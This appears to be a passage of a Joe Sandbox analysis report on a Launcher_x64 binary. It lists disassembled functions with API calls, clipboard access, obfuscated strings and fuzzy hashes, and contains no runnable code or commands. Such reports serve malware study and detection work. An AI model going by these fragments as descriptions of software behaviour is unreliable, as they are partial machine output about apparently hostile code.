                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                        • String ID: <;:9
                                                                                                                                                                                                                                                                                        • API String ID: 2994545307-3375088645
                                                                                                                                                                                                                                                                                        • Opcode ID: ea2a51e6249a908ff67df608b898d45a155b98b875273cdc1e1072d0039dcdbf
                                                                                                                                                                                                                                                                                        • Instruction ID: 5f15f40da82492e0b1ba2af83039ee2b9b7e6c15b25aba3d17fa9b47de68de05
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ea2a51e6249a908ff67df608b898d45a155b98b875273cdc1e1072d0039dcdbf
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 86412536B043209BD7249A66CC81B3BB2E6B7CD710F19993DE989E73D0D228EC009785
                                                                                                                                                                                                                                                                                        Function 0042C393 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: LppD
                                                                                                                                                                                                                                                                                        • API String ID: 0-4210666678
                                                                                                                                                                                                                                                                                        • Opcode ID: eefbf11c5dec5ab344813fc4d060d0068d94ab0567afc537f306fcfbd44f21c7
                                                                                                                                                                                                                                                                                        • Instruction ID: 855bee060028c4c386b9165997aa1c1878383dced02fbfdc783bb1665570fd4c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eefbf11c5dec5ab344813fc4d060d0068d94ab0567afc537f306fcfbd44f21c7
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 533149606047918BD7258F29D490333BBE1BF17304F18569DD0D68B786C73CE406CB99
                                                                                                                                                                                                                                                                                        Function 0043C591 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: b745c6b921c688ef65841581c84ab3f1f0f8b1fbe7e89272cb14133a7d6a03f5
                                                                                                                                                                                                                                                                                        • Instruction ID: c8b7ff01dbc89da8d6ea6474c81a927fa52fa21778feebd763115c9689ec260e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b745c6b921c688ef65841581c84ab3f1f0f8b1fbe7e89272cb14133a7d6a03f5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7121C736A041158BDB18CF28CCA157F7362FB9B310F69A579C822B7391D7349D02CB88
                                                                                                                                                                                                                                                                                        Function 0040C708 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 709 40c708-40c74b CoInitializeSecurity * 2
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C71A
                                                                                                                                                                                                                                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C732
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InitializeSecurity
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 640775948-0
                                                                                                                                                                                                                                                                                        • Opcode ID: a9fcc913b262d4d91c39290921aae48d96db57926766ac11a3d43773f4083c2f
                                                                                                                                                                                                                                                                                        • Instruction ID: 8836483fef9718eed69a3eb401eec82565d53f5260c1ee4ee56b77d015c0ed40
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a9fcc913b262d4d91c39290921aae48d96db57926766ac11a3d43773f4083c2f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2E0E2787C83007AF6B88B80AC17F103221A782FA2F740318F3217D2E5C5E03200851C
                                                                                                                                                                                                                                                                                        Function 0042C81F Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3664257935-0
                                                                                                                                                                                                                                                                                        • Opcode ID: e30c596180b53a115660af04bd7a6324405d873a3c2052b9d32e024041f48c30
                                                                                                                                                                                                                                                                                        • Instruction ID: fef5e511c25dd90ee2481010203ce8a11989a6ef7277a4b99bef1607bb5356d0
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e30c596180b53a115660af04bd7a6324405d873a3c2052b9d32e024041f48c30
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2212F70A043928BD7258F39D490B32BBE1BF6A345F18499ED4D387352C739A806CB69
                                                                                                                                                                                                                                                                                        Function 0043169E Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: BlanketProxy
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3890896728-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 1b706232c8508b99c9513138340112bcd4fc633695f233ad1e106145ab069449
                                                                                                                                                                                                                                                                                        • Instruction ID: 99f9e0275e3553d60d98f077b3ec4e5d3744d1100fe206b68e1fd2e2096be3e8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b706232c8508b99c9513138340112bcd4fc633695f233ad1e106145ab069449
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5C112DB46097418FC314DF28C569B567BE0FF8A304F05495DD486CB7A1CB7AB948CB41
                                                                                                                                                                                                                                                                                        Function 0043C330 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B23E,00000000,?,?), ref: 0043C362
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 6de1511ed9022200e782e57fe5e392477f89d2fbc5be729bb0dfac603b69d301
                                                                                                                                                                                                                                                                                        • Instruction ID: e369c52f231ad78f84bd32a4751c63da7a036563184d49fb13e449577516f3fe
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6de1511ed9022200e782e57fe5e392477f89d2fbc5be729bb0dfac603b69d301
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F5E02B36818310EBD3002F397C06B573A789F8A724F06583AF845A2125D738E81382AF
                                                                                                                                                                                                                                                                                        Function 0042FE63 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: BlanketProxy
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3890896728-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 5d18248fb324ad992eed188ae8d49b1edf644bf64f4cca6a05f3105ee15bf4d6
                                                                                                                                                                                                                                                                                        • Instruction ID: cf69311b2f7906215d5f9a2fdf864ddf242b4b50beeb3f972364ef3726ef5a4d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d18248fb324ad992eed188ae8d49b1edf644bf64f4cca6a05f3105ee15bf4d6
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 10F067B45097018FE314DF28D5A4B5ABBF0EB89304F11891DE4998B3A0C775AA49CF82
                                                                                                                                                                                                                                                                                        Function 004316DB Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: BlanketProxy
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3890896728-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 5e02709d0cdb075b96999847d3ac6bcd50698112236cc9de278e98ac8545c9f4
                                                                                                                                                                                                                                                                                        • Instruction ID: 3eaceb2e014506f690982f0843b9c29f30ab48e6e7b128695122f7153c1bd5f7
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e02709d0cdb075b96999847d3ac6bcd50698112236cc9de278e98ac8545c9f4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7AF07AB4509701CFD314EF28D56871BBBE0FB85308F01491CE4998B790C7BAA548CF86
                                                                                                                                                                                                                                                                                        Function 0040C6C0 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C6D3
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Initialize
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2538663250-0
                                                                                                                                                                                                                                                                                        • Opcode ID: b1e0911775c4594e58c624fa0b69b19cacf48127d6e319bcd97afd1595ad1424
                                                                                                                                                                                                                                                                                        • Instruction ID: a1b1aa57a00fe377383fdc852637ec76c540e68d6ade18ce1a169c0ba2b367a3
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b1e0911775c4594e58c624fa0b69b19cacf48127d6e319bcd97afd1595ad1424
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AAD0A7785601847BD200AB2CEC1BF26372CD307B95F000235F6A3C61D2E9507910C57D
                                                                                                                                                                                                                                                                                        Function 0043A8A0 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(?,00000000,?,0043C37B,?,0040B23E,00000000,?,?), ref: 0043A8BE
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 3f653a97980777988beddf4402dfa014889496ccf7d07c6997bf3b6c41101137
                                                                                                                                                                                                                                                                                        • Instruction ID: 28314e9eec856b95762a2db0f829bc7e29e5e9cb55e77819493c132b3ac68343
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3f653a97980777988beddf4402dfa014889496ccf7d07c6997bf3b6c41101137
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 47D01231905222EBC7101F14FC06B863B54EF09721F0345A1B404AB0B5C774DC9186D8
                                                                                                                                                                                                                                                                                        Function 0043A87F Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(?,00000000,?,?,00000000), ref: 0043A889
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 352bd915374fd58664ed3a4148089b8da909809154650511590e738249c08e02
                                                                                                                                                                                                                                                                                        • Instruction ID: b3c80175f663533894847c9a66b9f197813aaf9421f5bd2d561509b771ab2550
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 352bd915374fd58664ed3a4148089b8da909809154650511590e738249c08e02
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 78B00234145115B9E17117115CD5F7F1D6CEF43F95F104454B204140D047945402D57D

                                                                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                                                                        Function 00426EE0 Relevance: 23.3, APIs: 1, Strings: 12, Instructions: 506COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: jl$"F+X$#^9P$%J(L$'B:D$(R4T$2N1@$:Z$\$kV!h$mn$ryB${B
                                                                                                                                                                                                                                                                                        • API String ID: 0-1538198085
                                                                                                                                                                                                                                                                                        • Opcode ID: 5a8f9da79fc42f044587603d3f05118bc814a8cb24d0e0ec4d3fa280bdd9ec81
                                                                                                                                                                                                                                                                                        • Instruction ID: c601009fdba7fd998d586c2e1929966179365d4403c34ba6f7a7ad58ec389304
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5a8f9da79fc42f044587603d3f05118bc814a8cb24d0e0ec4d3fa280bdd9ec81
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FEF101B460C350CBD734DF24D851B5BBBE1FF86304F05496DE5889B292DB799805CB8A
                                                                                                                                                                                                                                                                                        Function 00432580 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 125clipboardCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                                                                        • String ID: 8$?$G$H$I$K$V
                                                                                                                                                                                                                                                                                        • API String ID: 2832541153-3986132860
                                                                                                                                                                                                                                                                                        • Opcode ID: 18847dea11fe6d3619e44b1371f6d828a2553772883ea2003fafcb793388adaa
                                                                                                                                                                                                                                                                                        • Instruction ID: a40d0bc31e7db4c16c9872b172ccf9ade393ad05595a022e5adcc8ad66d667d9
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 18847dea11fe6d3619e44b1371f6d828a2553772883ea2003fafcb793388adaa
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4341CFB250C3818ED305AF78994932FBED1AB96318F094A2EE4D587391DAB88549835B
                                                                                                                                                                                                                                                                                        Function 00426F00 Relevance: 18.1, Strings: 14, Instructions: 629COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: jl$"F+X$#^9P$%J(L$'B:D$(R4T$2N1@$:Z$\$KlGn$TqB$Z^XN$bFaj$kV!h$mn
                                                                                                                                                                                                                                                                                        • API String ID: 0-1793681726
                                                                                                                                                                                                                                                                                        • Opcode ID: 592f2e71d59995b5807a4fb568b9e4c36a1bf64629ef606bae1475088cf4a6d7
                                                                                                                                                                                                                                                                                        • Instruction ID: 5c6f29337a1c4246edf5aa31e021b7fcfaf81df006791dd0b2f5a19e52e9036c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 592f2e71d59995b5807a4fb568b9e4c36a1bf64629ef606bae1475088cf4a6d7
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E1237B5A0C351CFC7148F28E89136BBBE1AF86314F44486EE9C59B352D7789806CB97
                                                                                                                                                                                                                                                                                        Function 0040A6C0 Relevance: 10.4, Strings: 8, Instructions: 372COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: 9'gs$;<$CXdZ$G$@&$a\]^$gb(+$n`of$zlbz
                                                                                                                                                                                                                                                                                        • API String ID: 0-2826994576
                                                                                                                                                                                                                                                                                        • Opcode ID: 21c9a56eb0b088b1cfe986633598597846d16603d8cf98438421ab852f1b4ef3
                                                                                                                                                                                                                                                                                        • Instruction ID: 1766ed39920e717e0ef7c493068a3785e1707b6dd0c884577fa976e0f9216b6b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 21c9a56eb0b088b1cfe986633598597846d16603d8cf98438421ab852f1b4ef3
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F9C12A7164C3914FC328CF25945126BFBE2ABD1314F19893EE9D56B381D779880A8B87
                                                                                                                                                                                                                                                                                        Function 004225EF Relevance: 9.6, Strings: 7, Instructions: 807COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: JBI$5G4F$CGHv$HOyy$RZ$So]Z$oo]_
                                                                                                                                                                                                                                                                                        • API String ID: 0-1391714108
                                                                                                                                                                                                                                                                                        • Opcode ID: 8a70aa9ff92ae148bdc3f290c8c5a9f8ab6e9201005828d800c9111bdf3ec3af
                                                                                                                                                                                                                                                                                        • Instruction ID: d1071b791ef8fc50169c5f7008e24d58f9b16422e5163889b52f9cf591093796
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8a70aa9ff92ae148bdc3f290c8c5a9f8ab6e9201005828d800c9111bdf3ec3af
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 90420C796183129FD314CF29E89072BB7E2FB8A305F59897CE88597391DB38D801CB59
                                                                                                                                                                                                                                                                                        Function 00409220 Relevance: 9.2, Strings: 7, Instructions: 481COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: 68C6103D0F18277B312F742701D40858$<$KX]^$i$kXSD$}~$~@q}
                                                                                                                                                                                                                                                                                        • API String ID: 0-2505310567
                                                                                                                                                                                                                                                                                        • Opcode ID: c0ca9c90f307fbc670b3648e2a9e92d3c8d91de5366dea1fcbc3c291b9aadf11
                                                                                                                                                                                                                                                                                        • Instruction ID: ca08c7dc994906383c84d97b00ead15b932a24b8bd1c8dfa58b2ac8b606dd11b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c0ca9c90f307fbc670b3648e2a9e92d3c8d91de5366dea1fcbc3c291b9aadf11
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D4E16AB2A0C3148FC314DF64C89176BBBE6EBD1304F19497DE4E19B391D639C9098B86
                                                                                                                                                                                                                                                                                        Function 0041524C Relevance: 8.9, Strings: 6, Instructions: 1365COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: C*)?$C88,$E[Gx$]$]$h{
                                                                                                                                                                                                                                                                                        • API String ID: 0-2596919934
                                                                                                                                                                                                                                                                                        • Opcode ID: 1a25a37349253e337dc83aee5558089e7c54cb60df5fd1de93ec87baff3a65af
                                                                                                                                                                                                                                                                                        • Instruction ID: 946ff3345064ed1f49a0d3c9c1293e0ce8753abcfb306ffc685b823cbdff1208
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1a25a37349253e337dc83aee5558089e7c54cb60df5fd1de93ec87baff3a65af
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 02825876908750CBD324CF24D8907ABB7E2EFC6310F29896DE4C58B791D7789842CB96
                                                                                                                                                                                                                                                                                        Function 0041BF20 Relevance: 8.1, Strings: 6, Instructions: 600COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: 2{[.$<=$R{[.$Y8Y:$]xyz$vw
                                                                                                                                                                                                                                                                                        • API String ID: 0-654056292
                                                                                                                                                                                                                                                                                        • Opcode ID: 0a71ce16255bdeab97465fb56702f3eb8eb98e5b07403acaf3000d429db71e00
                                                                                                                                                                                                                                                                                        • Instruction ID: b8255bded3a0ab9dd70b1abc051f0f13c897e39093c7c7224cc838062c88527a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0a71ce16255bdeab97465fb56702f3eb8eb98e5b07403acaf3000d429db71e00
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA02FFB155C3109BD7149F65C8926ABBBF1EFD6304F08C92DE4C587281E7389908CB9A
                                                                                                                                                                                                                                                                                        Function 00408B10 Relevance: 7.8, Strings: 6, Instructions: 315COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
